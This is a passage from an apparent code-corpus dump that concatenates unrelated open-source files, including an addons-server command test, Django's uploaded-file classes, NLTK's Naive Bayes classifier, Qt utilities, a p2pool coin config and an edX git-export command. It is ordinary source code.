self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.inductor(.1e-9)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_scalar_gamma_z0_media(self):
'''
        test ability to create a Media from scalar quantities for gamma/z0
and change frequency resolution
'''
a = DefinedGammaZ0 (Frequency(1,10,101),gamma=1j,z0 = 50)
self.assertEqual(a.line(1),a.line(1))
# we should be able to re-sample the media
a.npoints = 21
self.assertEqual(len(a.gamma), len(a))
self.assertEqual(len(a.z0), len(a))
self.assertEqual(len(a.z0), len(a))
def test_vector_gamma_z0_media(self):
'''
        test ability to create a Media from vector quantities for gamma/z0
'''
freq = Frequency(1,10,101)
a = DefinedGammaZ0(freq,
gamma = 1j*npy.ones(len(freq)) ,
z0 = 50*npy.ones(len(freq)),
)
self.assertEqual(a.line(1),a.line(1))
with self.assertRaises(NotImplementedError):
a.npoints=4
def test_write_csv(self):
fname = os.path.join(self.files_dir,\
'out.csv')
self.dummy_media.write_csv(fname)
os.remove(fname)
def test_from_csv(self):
fname = os.path.join(self.files_dir,\
'out.csv')
self.dummy_media.write_csv(fname)
a_media = DefinedGammaZ0.from_csv(fname)
self.assertEqual(a_media,self.dummy_media)
os.remove(fname)
|
dezynetechnologies/odoo
|
refs/heads/8.0
|
addons/google_drive/__init__.py
|
437
|
import google_drive
|
hisie/django-select2
|
refs/heads/master
|
tests/testapp/__init__.py
|
12133432
| |
CSC-ORG/Dynamic-Dashboard-2015
|
refs/heads/master
|
engine/api/analytics/valid/__init__.py
|
12133432
| |
mstriemer/addons-server
|
refs/heads/master
|
src/olympia/addons/tests/test_commands.py
|
3
|
from django.conf import settings
from django.core.management import call_command
from django.core.management.base import CommandError
import pytest
from olympia import amo
from olympia.addons.management.commands import approve_addons
from olympia.amo.tests import addon_factory
from olympia.devhub.models import AddonLog
from olympia.editors.models import ReviewerScore
# Where to monkeypatch "lib.crypto.tasks.sign_addons" so it's correctly mocked.
SIGN_ADDONS = 'olympia.addons.management.commands.sign_addons.sign_addons'
# Test the "sign_addons" command.
def test_no_overridden_settings(monkeypatch):
assert not settings.SIGNING_SERVER
def no_endpoint(ids, **kwargs):
assert not settings.SIGNING_SERVER
monkeypatch.setattr(SIGN_ADDONS, no_endpoint)
call_command('sign_addons', 123)
def test_override_SIGNING_SERVER_setting(monkeypatch):
"""You can override the SIGNING_SERVER settings."""
assert not settings.SIGNING_SERVER
def signing_server(ids, **kwargs):
assert settings.SIGNING_SERVER == 'http://example.com'
monkeypatch.setattr(SIGN_ADDONS, signing_server)
call_command('sign_addons', 123, signing_server='http://example.com')
def test_force_signing(monkeypatch):
"""You can force signing an addon even if it's already signed."""
def not_forced(ids, force, reason):
assert not force
monkeypatch.setattr(SIGN_ADDONS, not_forced)
call_command('sign_addons', 123)
def is_forced(ids, force, reason):
assert force
monkeypatch.setattr(SIGN_ADDONS, is_forced)
call_command('sign_addons', 123, force=True)
def test_reason(monkeypatch):
"""You can pass a reason."""
def has_reason(ids, force, reason):
assert reason == 'expiry'
monkeypatch.setattr(SIGN_ADDONS, has_reason)
call_command('sign_addons', 123, reason='expiry')
# Test the "approve_addons" command.
@pytest.mark.django_db
def test_approve_addons_get_files_incomplete():
"""An incomplete add-on can't be approved."""
addon = addon_factory(status=amo.STATUS_NULL)
assert approve_addons.get_files([addon.guid]) == []
@pytest.mark.django_db
def test_approve_addons_get_files_bad_guid():
"""An add-on with another guid doesn't get approved."""
addon1 = addon_factory(status=amo.STATUS_NOMINATED, guid='foo')
addon1_file = addon1.find_latest_version(
amo.RELEASE_CHANNEL_LISTED).files.get()
addon1_file.update(status=amo.STATUS_AWAITING_REVIEW)
# Create another add-on that we won't get the files for.
addon2 = addon_factory(status=amo.STATUS_NOMINATED, guid='bar')
addon2_file = addon2.find_latest_version(
amo.RELEASE_CHANNEL_LISTED).files.get()
addon2_file.update(status=amo.STATUS_AWAITING_REVIEW)
# There's only the addon1's file returned, no other.
assert approve_addons.get_files(['foo']) == [addon1_file]
def id_function(fixture_value):
"""Convert a param from the use_case fixture to a nicer name.
By default, the name (used in the test generated from the parameterized
fixture) will use the fixture name and a number.
Eg: test_foo[use_case0]
Providing explicit 'ids' (either as strings, or as a function) will use
those names instead. Here the name will be something like
test_foo[public-unreviewed-full], for the status values, and if the file is
unreviewed.
"""
addon_status, file_status, review_type = fixture_value
return '{0}-{1}-{2}'.format(amo.STATUS_CHOICES_API[addon_status],
amo.STATUS_CHOICES_API[file_status],
review_type)
@pytest.fixture(
params=[(amo.STATUS_NOMINATED, amo.STATUS_AWAITING_REVIEW, 'full'),
(amo.STATUS_PUBLIC, amo.STATUS_AWAITING_REVIEW, 'full')],
# ids are used to build better names for the tests using this fixture.
ids=id_function)
def use_case(request, db):
"""This fixture will return quadruples for different use cases.
Addon | File1 and 2 | Review type
==============================================================
awaiting review | awaiting review | approved
approved | awaiting review | approved
"""
addon_status, file_status, review_type = request.param
addon = addon_factory(status=addon_status, guid='foo')
version = addon.find_latest_version(amo.RELEASE_CHANNEL_LISTED)
file1 = version.files.get()
file1.update(status=file_status)
# A second file for good measure.
file2 = amo.tests.file_factory(version=version, status=file_status)
# If the addon is public, and we change its only file to something else
# than public, it'll change to unreviewed.
addon.update(status=addon_status)
assert addon.reload().status == addon_status
assert file1.reload().status == file_status
assert file2.reload().status == file_status
return (addon, file1, file2, review_type)
@pytest.fixture
def mozilla_user(db):
"""Create and return the "mozilla" user used to auto approve addons."""
return amo.tests.user_factory(id=settings.TASK_USER_ID)
def test_approve_addons_get_files(use_case):
"""Files that need to get approved are returned in the list.
Use cases are quadruples taken from the "use_case" fixture above.
"""
addon, file1, file2, review_type = use_case
assert approve_addons.get_files([addon.guid]) == [file1, file2]
@pytest.mark.django_db
def test_approve_addons_approve_files_no_review_type():
"""Files which don't need approval don't change status."""
# Create the "mozilla" user, needed for the log.
amo.tests.user_factory(id=settings.TASK_USER_ID)
addon = addon_factory(status=amo.STATUS_PUBLIC)
file_ = addon.versions.get().files.get()
file_.update(status=amo.STATUS_PUBLIC)
approve_addons.approve_files([(file_, None)])
# Nothing changed.
assert addon.reload().status == amo.STATUS_PUBLIC
assert file_.reload().status == amo.STATUS_PUBLIC
def test_approve_addons_approve_files(use_case, mozilla_user):
"""Files are approved using the correct review type.
Use cases are quadruples taken from the "use_case" fixture above.
"""
addon, file1, file2, review_type = use_case
approve_addons.approve_files([(file1, review_type),
(file2, review_type)])
assert file1.reload().status == amo.STATUS_PUBLIC
assert file2.reload().status == amo.STATUS_PUBLIC
logs = AddonLog.objects.filter(addon=addon)
assert len(logs) == 2 # One per file.
file1_log, file2_log = logs
# An AddonLog has been created for each approval.
assert file1_log.activity_log.details['comments'] == u'bulk approval'
assert file1_log.activity_log.user == mozilla_user
assert file2_log.activity_log.details['comments'] == u'bulk approval'
assert file2_log.activity_log.user == mozilla_user
# No ReviewerScore was granted, it's an automatic approval.
assert not ReviewerScore.objects.all()
@pytest.mark.django_db
def test_approve_addons_get_review_type_already_approved():
"""The review type for a file that doesn't need approval is None."""
addon = addon_factory(status=amo.STATUS_PUBLIC)
file_ = addon.versions.get().files.get()
file_.update(status=amo.STATUS_PUBLIC)
assert approve_addons.get_review_type(file_) is None
def test_approve_addons_get_review_type(use_case):
"""Review type depends on the file and addon status.
Use cases are quadruples taken from the "use_case" fixture above.
"""
addon, file1, _, review_type = use_case
assert approve_addons.get_review_type(file1) == review_type
def test_process_addons_invalid_task():
with pytest.raises(CommandError):
call_command('process_addons', task='foo')
|
miquelramirez/LAPKT-public
|
refs/heads/master
|
2.0/external/fd/timers.py
|
3
|
from __future__ import print_function
# -*- coding: utf-8 -*-
import contextlib
import os
import sys
import time
class Timer(object):
def __init__(self):
self.start_time = time.time()
self.start_clock = self._clock()
def _clock(self):
times = os.times()
return times[0] + times[1]
def __str__(self):
return "[%.3fs CPU, %.3fs wall-clock]" % (
self._clock() - self.start_clock,
time.time() - self.start_time)
    def report(self):
return self._clock() - self.start_clock
@contextlib.contextmanager
def timing(text, block=False):
timer = Timer()
if block:
print("%s..." % text)
else:
print("%s..." % text, end=' ')
sys.stdout.flush()
yield
if block:
print("%s: %s" % (text, timer))
else:
print(timer)
sys.stdout.flush()
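# Usage sketch (illustrative, not part of the original module): the timing()
# context manager prints the label when the block starts and the elapsed
# CPU/wall-clock time when it finishes.
#
#     with timing("Computing heuristic"):
#         run_search()   # any long-running callable (hypothetical)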
|
litchfield/django
|
refs/heads/master
|
django/core/files/uploadedfile.py
|
471
|
"""
Classes representing uploaded files.
"""
import errno
import os
from io import BytesIO
from django.conf import settings
from django.core.files import temp as tempfile
from django.core.files.base import File
from django.utils.encoding import force_str
__all__ = ('UploadedFile', 'TemporaryUploadedFile', 'InMemoryUploadedFile',
'SimpleUploadedFile')
class UploadedFile(File):
"""
    An abstract uploaded file (``TemporaryUploadedFile`` and
``InMemoryUploadedFile`` are the built-in concrete subclasses).
An ``UploadedFile`` object behaves somewhat like a file object and
represents some file data that the user submitted with a form.
"""
DEFAULT_CHUNK_SIZE = 64 * 2 ** 10
def __init__(self, file=None, name=None, content_type=None, size=None, charset=None, content_type_extra=None):
super(UploadedFile, self).__init__(file, name)
self.size = size
self.content_type = content_type
self.charset = charset
self.content_type_extra = content_type_extra
def __repr__(self):
return force_str("<%s: %s (%s)>" % (
self.__class__.__name__, self.name, self.content_type))
def _get_name(self):
return self._name
def _set_name(self, name):
# Sanitize the file name so that it can't be dangerous.
if name is not None:
# Just use the basename of the file -- anything else is dangerous.
name = os.path.basename(name)
# File names longer than 255 characters can cause problems on older OSes.
if len(name) > 255:
name, ext = os.path.splitext(name)
ext = ext[:255]
name = name[:255 - len(ext)] + ext
self._name = name
name = property(_get_name, _set_name)
class TemporaryUploadedFile(UploadedFile):
"""
A file uploaded to a temporary location (i.e. stream-to-disk).
"""
def __init__(self, name, content_type, size, charset, content_type_extra=None):
if settings.FILE_UPLOAD_TEMP_DIR:
file = tempfile.NamedTemporaryFile(suffix='.upload',
dir=settings.FILE_UPLOAD_TEMP_DIR)
else:
file = tempfile.NamedTemporaryFile(suffix='.upload')
super(TemporaryUploadedFile, self).__init__(file, name, content_type, size, charset, content_type_extra)
def temporary_file_path(self):
"""
Returns the full path of this file.
"""
return self.file.name
def close(self):
try:
return self.file.close()
except OSError as e:
if e.errno != errno.ENOENT:
# Means the file was moved or deleted before the tempfile
# could unlink it. Still sets self.file.close_called and
# calls self.file.file.close() before the exception
raise
class InMemoryUploadedFile(UploadedFile):
"""
A file uploaded into memory (i.e. stream-to-memory).
"""
def __init__(self, file, field_name, name, content_type, size, charset, content_type_extra=None):
super(InMemoryUploadedFile, self).__init__(file, name, content_type, size, charset, content_type_extra)
self.field_name = field_name
def open(self, mode=None):
self.file.seek(0)
def chunks(self, chunk_size=None):
self.file.seek(0)
yield self.read()
def multiple_chunks(self, chunk_size=None):
# Since it's in memory, we'll never have multiple chunks.
return False
class SimpleUploadedFile(InMemoryUploadedFile):
"""
A simple representation of a file, which just has content, size, and a name.
"""
def __init__(self, name, content, content_type='text/plain'):
content = content or b''
super(SimpleUploadedFile, self).__init__(BytesIO(content), None, name,
content_type, len(content), None, None)
@classmethod
def from_dict(cls, file_dict):
"""
Creates a SimpleUploadedFile object from
a dictionary object with the following keys:
- filename
- content-type
- content
"""
return cls(file_dict['filename'],
file_dict['content'],
file_dict.get('content-type', 'text/plain'))
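# Illustrative sketch (not part of the original module): SimpleUploadedFile is
# convenient for faking uploads in tests, either directly or via from_dict()
# with the dictionary layout documented above.
#
#     f = SimpleUploadedFile("hello.txt", b"content", content_type="text/plain")
#     g = SimpleUploadedFile.from_dict(
#         {"filename": "hello.txt", "content": b"content",
#          "content-type": "text/plain"})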
|
danbradham/hotline
|
refs/heads/master
|
hotline/utils.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from contextlib import contextmanager
from functools import partial
try:
from Queue import Queue
except ImportError:
from queue import Queue
from timeit import default_timer
import subprocess
import sys
from hotline.vendor.Qt import QtCore, QtGui, QtWidgets
__all__ = [
'Executor',
'execute_in_main_thread',
'new_process',
'redirect_stream',
'qt_sleep',
'sleep_until',
]
def keys_to_string(key, modifiers):
key = QtGui.QKeySequence(key).toString()
if key == 'Return':
key = 'Enter'
if key == 'Backtab':
key = 'Tab'
mods = []
if modifiers & QtCore.Qt.ShiftModifier:
mods.append('Shift+')
if modifiers & QtCore.Qt.ControlModifier:
mods.append('Ctrl+')
if modifiers & QtCore.Qt.AltModifier:
mods.append('Alt+')
if modifiers & QtCore.Qt.MetaModifier:
mods.append('Meta+')
mods = ''.join(mods)
return '+'.join([mods, key])
def new_process(*args, **kwargs):
'''Wraps subprocess.Popen and polls until the process returns or the
timeout is reached (2 seconds by default).
:param args: subprocess.Popen args
:param kwargs: subprocess.Popen kwargs
:param timeout: Number of seconds to poll process before returning
:returns: (stdout, stderr) or None if timeout reached
'''
timeout = kwargs.pop('timeout', 2)
if sys.platform == 'win32':
create_new_process_group = 0x00000200
detached_process = 0x00000008
creation_flags = detached_process | create_new_process_group
kwargs.setdefault('creationflags', creation_flags)
kwargs.setdefault('stdin', subprocess.PIPE)
kwargs.setdefault('stdout', subprocess.PIPE)
kwargs.setdefault('stderr', subprocess.PIPE)
kwargs.setdefault('shell', True)
p = subprocess.Popen(args, **kwargs)
s = default_timer()
while default_timer() - s < timeout:
p.poll()
if p.returncode is not None:
break
if p.returncode is None:
return
return p.stdout.read(), p.stderr.read()
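# Usage sketch (illustrative only): run a short shell command and collect its
# output, or get None back if it does not finish within the timeout.
#
#     result = new_process('echo hello', timeout=2)
#     if result is not None:
#         out, err = result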
@contextmanager
def redirect_stream(stdout=None, stderr=None, stdin=None):
'''Temporarily redirect output stream'''
sys.stdout = stdout or sys.__stdout__
sys.stderr = stderr or sys.__stderr__
sys.stdin = stdin or sys.__stdin__
try:
yield
finally:
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.stdin = sys.__stdin__
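# Usage sketch (illustrative only): capture anything printed inside the block
# into an in-memory buffer; the real streams are restored on exit.
#
#     import io
#     buf = io.StringIO()
#     with redirect_stream(stdout=buf):
#         print('captured')
#     text = buf.getvalue()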
class Executor(QtCore.QObject):
'''Executes functions in the main QThread'''
def __init__(self):
super(Executor, self).__init__()
self.queue = Queue()
def execute(self, fn, *args, **kwargs):
callback = partial(fn, *args, **kwargs)
self.queue.put(callback)
QtCore.QMetaObject.invokeMethod(
self,
'_execute',
QtCore.Qt.QueuedConnection
)
@QtCore.Slot()
def _execute(self):
callback = self.queue.get()
callback()
Executor = Executor()
def execute_in_main_thread(fn, *args, **kwargs):
'''
    Convenience wrapper around Executor.execute: executes a function in the
main QThread as soon as possible.
'''
Executor.execute(fn, *args, **kwargs)
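# Usage sketch (illustrative only): schedule a callable to run on the main Qt
# thread, e.g. from a worker thread that must not touch widgets directly.
# 'status_label' is a hypothetical QLabel living on the main thread.
#
#     execute_in_main_thread(status_label.setText, 'done')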
@contextmanager
def event_loop(conditions=None, timeout=None, parent=None):
loop = QtCore.QEventLoop(parent)
if timeout:
QtCore.QTimer.singleShot(timeout, loop.quit)
if conditions:
ctimer = QtCore.QTimer()
def check_conditions():
for condition in conditions:
if condition():
ctimer.stop()
loop.quit()
ctimer.timeout.connect(check_conditions)
ctimer.start()
try:
yield loop
finally:
loop.exec_()
def qt_sleep(secs=0):
'''Non-blocking sleep for Qt'''
start = default_timer()
app = QtWidgets.QApplication.instance()
while True:
app.processEvents()
if default_timer() - start > secs:
return
def sleep_until(wake_condition, timeout=None, sleep=qt_sleep):
'''
Process QApplication events until the wake_condition returns True or
the timeout is reached...
:param wake_condition: callable returning True or False
:param timeout: Number of seconds to wait before returning
'''
start = default_timer()
while True:
if timeout:
if default_timer() - start > timeout:
return
if wake_condition():
return
sleep(0.1)
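# Usage sketch (illustrative only): wait until some other code appends to
# 'done', or two seconds elapse, while keeping the Qt event loop responsive.
#
#     done = []
#     sleep_until(lambda: bool(done), timeout=2)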
|
Comunitea/CMNT_004_15
|
refs/heads/11.0
|
project-addons/ubl_edi_to_es/models/sale.py
|
1
|
from odoo import models, fields
class SaleOrderLine(models.Model):
_inherit = 'sale.order.line'
qty_available_es = fields.Float('Qty Avail. ES', related="product_id.virtual_stock_conservative_es",readonly=1)
|
savoirfairelinux/django
|
refs/heads/master
|
tests/migrations/test_migrations_unmigdep/0001_initial.py
|
133
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("auth", "__first__"),
]
operations = [
migrations.CreateModel(
"Book",
[
("id", models.AutoField(primary_key=True)),
("user", models.ForeignKey("auth.User", models.SET_NULL, null=True)),
],
)
]
|
coblo/isccbench
|
refs/heads/master
|
iscc_bench/scripts/title_length.py
|
1
|
# -*- coding: utf-8 -*-
"""Script to measure basic title length statistics"""
import unicodedata
from itertools import cycle
import numpy as np
from iscc_bench.readers import ALL_READERS
def iter_titles():
"""Iterate over titles"""
readers = [r() for r in ALL_READERS]
for reader in cycle(readers):
meta = next(reader)
yield meta.title
def reject_outliers(data, m=2.0):
"""Remove outliers from data."""
d = np.abs(data - np.median(data))
mdev = np.median(d)
s = d / mdev if mdev else 0.0
return data[s < m]
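# Worked example (illustrative only): for data = np.array([4, 5, 5, 6, 50]) the
# median is 5, the absolute deviations are [1, 0, 0, 1, 45] and their median
# (mdev) is 1, so the scaled deviations are [1, 0, 0, 1, 45] and 50 is dropped
# with the default m=2.0:
#
#     reject_outliers(np.array([4, 5, 5, 6, 50]))   # -> array([4, 5, 5, 6])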
def check_subtitles():
readers = [r() for r in ALL_READERS]
for reader in cycle(readers):
meta = next(reader)
if " : " in meta.title:
print(reader.__name__, meta.title)
if __name__ == "__main__":
SAMPLE_SIZE = 100000
title_sizes = []
title_sizes_bytes = []
for n, title in enumerate(iter_titles()):
norm_title = unicodedata.normalize("NFKC", title)
title_sizes.append(len(norm_title))
title_sizes_bytes.append(len(norm_title.encode("utf-8")))
if n > SAMPLE_SIZE:
break
data = np.array(title_sizes, dtype=np.uint16)
abs_max = max(data)
print("Longest title in {} samples had {} chars.".format(SAMPLE_SIZE, abs_max))
print(
"Longest title in {} samples had {} bytes.".format(
SAMPLE_SIZE, max(title_sizes_bytes)
)
)
print("The mean title length of all titles is {} chars ".format(data.mean()))
cleaned = reject_outliers(data)
max_real = max(cleaned)
print("The longest title without outliers is {} chars.".format(max_real))
print("The mean title length without outliers is {} chars.".format(cleaned.mean()))
|
xiaozhuchacha/OpenBottle
|
refs/heads/master
|
grammar_induction/earley_parser/nltk/classify/naivebayes.py
|
7
|
# Natural Language Toolkit: Naive Bayes Classifiers
#
# Copyright (C) 2001-2017 NLTK Project
# Author: Edward Loper <edloper@gmail.com>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
A classifier based on the Naive Bayes algorithm. In order to find the
probability for a label, this algorithm first uses the Bayes rule to
express P(label|features) in terms of P(label) and P(features|label):
| P(label) * P(features|label)
| P(label|features) = ------------------------------
| P(features)
The algorithm then makes the 'naive' assumption that all features are
independent, given the label:
| P(label) * P(f1|label) * ... * P(fn|label)
| P(label|features) = --------------------------------------------
| P(features)
Rather than computing P(features) explicitly, the algorithm just
calculates the numerator for each label, and normalizes them so they
sum to one:
| P(label) * P(f1|label) * ... * P(fn|label)
| P(label|features) = --------------------------------------------
| SUM[l]( P(l) * P(f1|l) * ... * P(fn|l) )
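A worked example (illustrative, not from the original text): with two labels
where P(A) * P(f1|A) = 0.06 and P(B) * P(f1|B) = 0.02, normalizing the two
numerators gives P(A|features) = 0.06 / (0.06 + 0.02) = 0.75 and
P(B|features) = 0.25, without ever computing P(features) itself.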
"""
from __future__ import print_function, unicode_literals
from collections import defaultdict
from nltk.probability import FreqDist, DictionaryProbDist, ELEProbDist, sum_logs
from nltk.classify.api import ClassifierI
##//////////////////////////////////////////////////////
## Naive Bayes Classifier
##//////////////////////////////////////////////////////
class NaiveBayesClassifier(ClassifierI):
"""
A Naive Bayes classifier. Naive Bayes classifiers are
    parameterized by two probability distributions:
- P(label) gives the probability that an input will receive each
label, given no information about the input's features.
- P(fname=fval|label) gives the probability that a given feature
      (fname) will receive a given value (fval), given the
label (label).
If the classifier encounters an input with a feature that has
never been seen with any label, then rather than assigning a
probability of 0 to all labels, it will ignore that feature.
The feature value 'None' is reserved for unseen feature values;
you generally should not use 'None' as a feature value for one of
your own features.
"""
def __init__(self, label_probdist, feature_probdist):
"""
:param label_probdist: P(label), the probability distribution
over labels. It is expressed as a ``ProbDistI`` whose
samples are labels. I.e., P(label) =
``label_probdist.prob(label)``.
:param feature_probdist: P(fname=fval|label), the probability
distribution for feature values, given labels. It is
expressed as a dictionary whose keys are ``(label, fname)``
pairs and whose values are ``ProbDistI`` objects over feature
values. I.e., P(fname=fval|label) =
``feature_probdist[label,fname].prob(fval)``. If a given
``(label,fname)`` is not a key in ``feature_probdist``, then
it is assumed that the corresponding P(fname=fval|label)
is 0 for all values of ``fval``.
"""
self._label_probdist = label_probdist
self._feature_probdist = feature_probdist
self._labels = list(label_probdist.samples())
def labels(self):
return self._labels
def classify(self, featureset):
return self.prob_classify(featureset).max()
def prob_classify(self, featureset):
# Discard any feature names that we've never seen before.
# Otherwise, we'll just assign a probability of 0 to
# everything.
featureset = featureset.copy()
for fname in list(featureset.keys()):
for label in self._labels:
if (label, fname) in self._feature_probdist:
break
else:
#print 'Ignoring unseen feature %s' % fname
del featureset[fname]
        # Find the log probability of each label, given the features.
# Start with the log probability of the label itself.
logprob = {}
for label in self._labels:
logprob[label] = self._label_probdist.logprob(label)
# Then add in the log probability of features given labels.
for label in self._labels:
for (fname, fval) in featureset.items():
if (label, fname) in self._feature_probdist:
feature_probs = self._feature_probdist[label, fname]
logprob[label] += feature_probs.logprob(fval)
else:
# nb: This case will never come up if the
# classifier was created by
# NaiveBayesClassifier.train().
logprob[label] += sum_logs([]) # = -INF.
return DictionaryProbDist(logprob, normalize=True, log=True)
def show_most_informative_features(self, n=10):
# Determine the most relevant features, and display them.
cpdist = self._feature_probdist
print('Most Informative Features')
for (fname, fval) in self.most_informative_features(n):
def labelprob(l):
return cpdist[l, fname].prob(fval)
labels = sorted([l for l in self._labels
if fval in cpdist[l, fname].samples()],
key=labelprob)
if len(labels) == 1:
continue
l0 = labels[0]
l1 = labels[-1]
if cpdist[l0, fname].prob(fval) == 0:
ratio = 'INF'
else:
ratio = '%8.1f' % (cpdist[l1, fname].prob(fval) /
cpdist[l0, fname].prob(fval))
print(('%24s = %-14r %6s : %-6s = %s : 1.0' %
(fname, fval, ("%s" % l1)[:6], ("%s" % l0)[:6], ratio)))
def most_informative_features(self, n=100):
"""
Return a list of the 'most informative' features used by this
classifier. For the purpose of this function, the
informativeness of a feature ``(fname,fval)`` is equal to the
highest value of P(fname=fval|label), for any label, divided by
the lowest value of P(fname=fval|label), for any label:
| max[ P(fname=fval|label1) / P(fname=fval|label2) ]
"""
# The set of (fname, fval) pairs used by this classifier.
features = set()
# The max & min probability associated w/ each (fname, fval)
# pair. Maps (fname,fval) -> float.
maxprob = defaultdict(lambda: 0.0)
minprob = defaultdict(lambda: 1.0)
for (label, fname), probdist in self._feature_probdist.items():
for fval in probdist.samples():
feature = (fname, fval)
features.add(feature)
p = probdist.prob(fval)
maxprob[feature] = max(p, maxprob[feature])
minprob[feature] = min(p, minprob[feature])
if minprob[feature] == 0:
features.discard(feature)
# Convert features to a list, & sort it by how informative
# features are.
features = sorted(features,
key=lambda feature_:
minprob[feature_]/maxprob[feature_])
return features[:n]
@classmethod
def train(cls, labeled_featuresets, estimator=ELEProbDist):
"""
:param labeled_featuresets: A list of classified featuresets,
i.e., a list of tuples ``(featureset, label)``.
"""
label_freqdist = FreqDist()
feature_freqdist = defaultdict(FreqDist)
feature_values = defaultdict(set)
fnames = set()
# Count up how many times each feature value occurred, given
# the label and featurename.
for featureset, label in labeled_featuresets:
label_freqdist[label] += 1
for fname, fval in featureset.items():
# Increment freq(fval|label, fname)
feature_freqdist[label, fname][fval] += 1
# Record that fname can take the value fval.
feature_values[fname].add(fval)
# Keep a list of all feature names.
fnames.add(fname)
# If a feature didn't have a value given for an instance, then
# we assume that it gets the implicit value 'None.' This loop
# counts up the number of 'missing' feature values for each
# (label,fname) pair, and increments the count of the fval
# 'None' by that amount.
for label in label_freqdist:
num_samples = label_freqdist[label]
for fname in fnames:
count = feature_freqdist[label, fname].N()
# Only add a None key when necessary, i.e. if there are
# any samples with feature 'fname' missing.
if num_samples - count > 0:
feature_freqdist[label, fname][None] += num_samples - count
feature_values[fname].add(None)
# Create the P(label) distribution
label_probdist = estimator(label_freqdist)
# Create the P(fval|label, fname) distribution
feature_probdist = {}
for ((label, fname), freqdist) in feature_freqdist.items():
probdist = estimator(freqdist, bins=len(feature_values[fname]))
feature_probdist[label, fname] = probdist
return cls(label_probdist, feature_probdist)
##//////////////////////////////////////////////////////
## Demo
##//////////////////////////////////////////////////////
def demo():
from nltk.classify.util import names_demo
classifier = names_demo(NaiveBayesClassifier.train)
classifier.show_most_informative_features()
if __name__ == '__main__':
demo()
|
cowboysmall/rosalind
|
refs/heads/master
|
src/stronghold/rosalind_osym.py
|
1
|
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../tools'))
import fasta
import strings
def main(argv):
s, t = fasta.read_ordered(argv[0])
m, n = len(s), len(t)
T1 = strings.mismatch_alignment_table(s, t)
T2 = strings.mismatch_alignment_table(s[::-1], t[::-1])
total = 0
for i in xrange(1, m + 1):
for j in xrange(1, n + 1):
total += T1[i - 1][j - 1] + T2[m - i][n - j] + (1 if s[i - 1] == t[j - 1] else -1)
print T1[m][n]
print total
if __name__ == "__main__":
main(sys.argv[1:])
|
Rav3nPL/p2pool-rav
|
refs/heads/master
|
p2pool/bitcoin/networks/joulecoin.py
|
7
|
import os
import platform
from twisted.internet import defer
from .. import data, helper
from p2pool.util import pack
P2P_PREFIX = 'a5c07955'.decode('hex')
P2P_PORT = 26789
ADDRESS_VERSION = 43
RPC_PORT = 8844
RPC_CHECK = defer.inlineCallbacks(lambda bitcoind: defer.returnValue(
'joulecoinaddress' in (yield bitcoind.rpc_help()) and
not (yield bitcoind.rpc_getinfo())['testnet']
))
SUBSIDY_FUNC = lambda height: 16*100000000 >> (height * 1)//1401600
POW_FUNC = data.hash256
BLOCK_PERIOD = 45 # s
SYMBOL = 'XJO'
CONF_FILE_FUNC = lambda: os.path.join(os.path.join(os.environ['APPDATA'], 'joulecoin') if platform.system() == 'Windows' else os.path.expanduser('~/Library/Application Support/joulecoin/') if platform.system() == 'Darwin' else os.path.expanduser('~/.joulecoin'), 'joulecoin.conf')
BLOCK_EXPLORER_URL_PREFIX = 'http://xjo-explorer.cryptohaus.com:2750/block/'
ADDRESS_EXPLORER_URL_PREFIX = 'http://xjo-explorer.cryptohaus.com:2750/address/'
TX_EXPLORER_URL_PREFIX = 'http://xjo-explorer.cryptohaus.com:2750/tx/'
SANE_TARGET_RANGE = (2**256//2**32//1000 - 1, 2**256//2**32 - 1)
DUMB_SCRYPT_DIFF = 1
DUST_THRESHOLD = 0.001e8
|
Semi-global/edx-platform
|
refs/heads/master
|
cms/djangoapps/contentstore/management/commands/git_export.py
|
164
|
"""
This command exports a course from CMS to a git repository.
It takes as arguments the course id to export (e.g. MITx/999/2020) and
the repository to commit to. It takes username as an option for identifying
the commit, as well as a directory path to place the git repository.
By default it will use settings.GIT_REPO_EXPORT_DIR/repo_name as the cloned
directory. It is branch aware, but will reset all local changes to the
repository before attempting to export the XML, add, and commit changes if
any have taken place.
This functionality is also available as an export view in studio if the giturl
attribute is set and the FEATURE['ENABLE_EXPORT_GIT'] flag is set.
"""
import logging
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.utils.translation import ugettext as _
import contentstore.git_export_utils as git_export_utils
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys import InvalidKeyError
from contentstore.git_export_utils import GitExportError
from opaque_keys.edx.keys import CourseKey
log = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Take a course from studio and export it to a git repository.
"""
option_list = BaseCommand.option_list + (
make_option('--username', '-u', dest='user',
help=('Specify a username from LMS/Studio to be used '
'as the commit author.')),
make_option('--repo_dir', '-r', dest='repo',
help='Specify existing git repo directory.'),
)
help = _('Take the specified course and attempt to '
'export it to a git repository\n. Course directory '
'must already be a git repository. Usage: '
' git_export <course_loc> <git_url>')
def handle(self, *args, **options):
"""
Checks arguments and runs export function if they are good
"""
if len(args) != 2:
raise CommandError('This script requires exactly two arguments: '
'course_loc and git_url')
# Rethrow GitExportError as CommandError for SystemExit
try:
course_key = CourseKey.from_string(args[0])
except InvalidKeyError:
try:
course_key = SlashSeparatedCourseKey.from_deprecated_string(args[0])
except InvalidKeyError:
raise CommandError(unicode(GitExportError.BAD_COURSE))
try:
git_export_utils.export_to_git(
course_key,
args[1],
options.get('user', ''),
                options.get('repo', None)
)
except git_export_utils.GitExportError as ex:
raise CommandError(unicode(ex.message))
|
EmergingTechnologyAdvisors/blockly
|
refs/heads/master
|
i18n/tests.py
|
203
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Tests of i18n scripts.
#
# Copyright 2013 Google Inc.
# https://developers.google.com/blockly/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import common
import re
import unittest
class TestSequenceFunctions(unittest.TestCase):
def test_insert_breaks(self):
spaces = re.compile(r'\s+|\\n')
